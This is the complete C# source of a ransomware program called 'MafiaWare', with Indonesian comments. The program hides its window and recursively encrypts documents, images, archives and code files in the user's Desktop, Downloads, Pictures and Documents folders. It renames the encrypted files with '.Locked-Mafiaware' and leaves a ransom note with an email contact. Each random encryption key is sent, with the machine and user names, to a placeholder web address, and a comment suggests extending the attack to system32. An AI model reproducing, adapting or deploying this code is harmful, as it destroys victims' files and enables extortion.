RANSOMWARE

1. /*
2. *
3. * MAFIAWARE
4. *
5. */
6.  
7. using System;
8. using System.Diagnostics;
9. using System.Collections.Generic;
10. using System.ComponentModel;
11. using System.Data;
12. using System.Drawing;
13. using System.Linq;
14. using System.Text;
15. using System.Threading.Tasks;
16. using System.Windows.Forms;
17. using System.Security;
18. using System.Security.Cryptography;
19. using System.IO;
20. using System.Net;
21. using Microsoft.Win32;
22. using System.Runtime.InteropServices;
23. using System.Text.RegularExpressions;
24.  
25. namespace mafiaware {
26. public partial class Form1 : Form {
27. //Web untuk Password Unlock nya
28. string webPass = "https://yourweb.com/cyberking/w00t.php?g0ttrap=";
29. string namaUser = Environment.UserName;
30. string namaKompi = System.Environment.MachineName.ToString();
31. string dirUsr = "C:\\Users\\"; //folder User
32. // bisa di coba ke folder system32
33. //string dirSystm = "C:\\Windows\\"; <-- folder Windows di targetkan ke system32 di ubah/tambah bagian fungsi ngencrypt nya
34.  
35. public Form1() {
36. InitializeComponent();
37. }
38. private void Form1_Load(object sender, EventArgs e) {
39. Opacity = 0;
40. this.ShowInTaskbar = false;
41. ngeEnrypt(); //mulai ngencrypt nya pas loading
42. ngeEnrypt2();
43. ngeEnrypt3();
44. ngeEnrypt4();
45. }
46. private void Form_Shown(object sender, EventArgs e) {
47. Visible = false;
48. Opacity = 100;
49. }
50.  
51. //Algo encrypt AES256
52. public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes) {
53. byte[] encryptedBytes = null;
54. byte[] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 };
55. using (MemoryStream ms = new MemoryStream()) {
56. using (RijndaelManaged AES = new RijndaelManaged()) {
57. AES.KeySize = 256;
58. AES.BlockSize = 128;
59. var key = new Rfc2898DeriveBytes(passwordBytes, saltBytes, 1000);
60. AES.Key = key.GetBytes(AES.KeySize / 8);
61. AES.IV = key.GetBytes(AES.BlockSize / 8);
62. AES.Mode = CipherMode.CBC;
63. using (var cs = new CryptoStream(ms, AES.CreateEncryptor(), CryptoStreamMode.Write)) {
64. cs.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length);
65. cs.Close();
66. }
67. encryptedBytes = ms.ToArray();
68. }
69. }
70. return encryptedBytes;
71. }
72.  
73. //buat randompass encrypt
74. public string BuatPass(int length) {
75. const string valid = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=&?&/";
76. StringBuilder res = new StringBuilder();
77. Random rnd = new Random();
78. while (0 < length--){
79. res.Append(valid[rnd.Next(valid.Length)]);
80. }
81. return res.ToString();
82. }
83.  
84. //ngirim pass hasil trap ke web
85. public void ngirimPass(string password){
86. string g0ttrap = namaKompi + "-" + namaUser + " " + password;
87. var fullUrl = webPass + g0ttrap;
88. var conent = new System.Net.WebClient().DownloadString(fullUrl);
89. }
90.  
91. //ngencrypt file
92. public void ngencryptFile(string file, string password) {
93. byte[] bytesToBeEncrypted = File.ReadAllBytes(file);
94. byte[] passwordBytes = Encoding.UTF8.GetBytes(password);
95.  
96. //ngehash pass dg sha256
97. passwordBytes = SHA256.Create().ComputeHash(passwordBytes);
98. byte[] bytesEncrypted = AES_Encrypt(bytesToBeEncrypted, passwordBytes);
99. File.WriteAllBytes(file, bytesEncrypted);
100. System.IO.File.Move(file, file+".Locked-Mafiaware"); //ekstensi hasil ngencrypt
101. }
102.  
103. //ngencrypt folder
104. public void ngencryptFolder(string location, string password) {
105. //ekstensi yang mau di encrypt
106. var validExtensions = new[] {
107. ".txt", ".doc", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd", ".zip", ".rar"
108. };
109.  
110. string[] files = Directory.GetFiles(location);
111. string[] childDirectories = Directory.GetDirectories(location);
112. for (int i = 0; i < files.Length; i++){
113. string extension = Path.GetExtension(files[i]);
114. if (validExtensions.Contains(extension))
115. {
116. ngencryptFile(files[i],password);
117. }
118. }
119. for (int i = 0; i < childDirectories.Length; i++){
120. ngencryptFolder(childDirectories[i],password);
121. }
122. }
123. public void ngeEnrypt() {
124. string password = BuatPass(15);
125. string path = "\\Desktop";
126. string startPath = dirUsr + namaUser + path;
127. ngirimPass(password);
128. ngencryptFolder(startPath,password);
129. pesanReadMe();
130. password = null;
131. System.Windows.Forms.Application.Exit();
132. }
133. public void ngeEnrypt2() {
134. string password = BuatPass(15);
135. string path = "\\Downloads";
136. string startPath = dirUsr + namaUser + path;
137. ngirimPass(password);
138. ngencryptFolder(startPath,password);
139. password = null;
140. System.Windows.Forms.Application.Exit();
141. }
142. public void ngeEnrypt3() {
143. string password = BuatPass(15);
144. string path = "\\Pictures";
145. string startPath = dirUsr + namaUser + path;
146. ngirimPass(password);
147. ngencryptFolder(startPath,password);
148. password = null;
149. System.Windows.Forms.Application.Exit();
150. }
151.  
152. //ngencrypt 4 bagian document, jika ada folder music / shortcut music, itu ga bakal kena, perbedaan auth :p akalin sendiri utk lebih jelas
153. public void ngeEnrypt4() {
154. string password = BuatPass(15);
155. string path = "\\Documents";
156. string startPath = dirUsr + namaUser + path;
157. ngirimPass(password);
158. ngencryptFolder(startPath,password);
159. password = null;
160. System.Windows.Forms.Application.Exit();
161. }
162. //Pesanini diletakkan di folder desktop ( bisa di ubah atau di tambah lokasi nya, edit di bagian fungsi ngencrypt )
163. public void pesanReadMe() {
164. string path = "\\Desktop\\READ_ME.txt";
165. string fullpath = dirUsr + namaUser + path;
166. string[] lines = { "Cyberking was Encrypt your File with MafiaWare", "Email me and meet me", "my email cyberking@indonesianbacktrack.or.id" };
167. System.IO.File.WriteAllLines(fullpath, lines);
168. }
169. }
170. }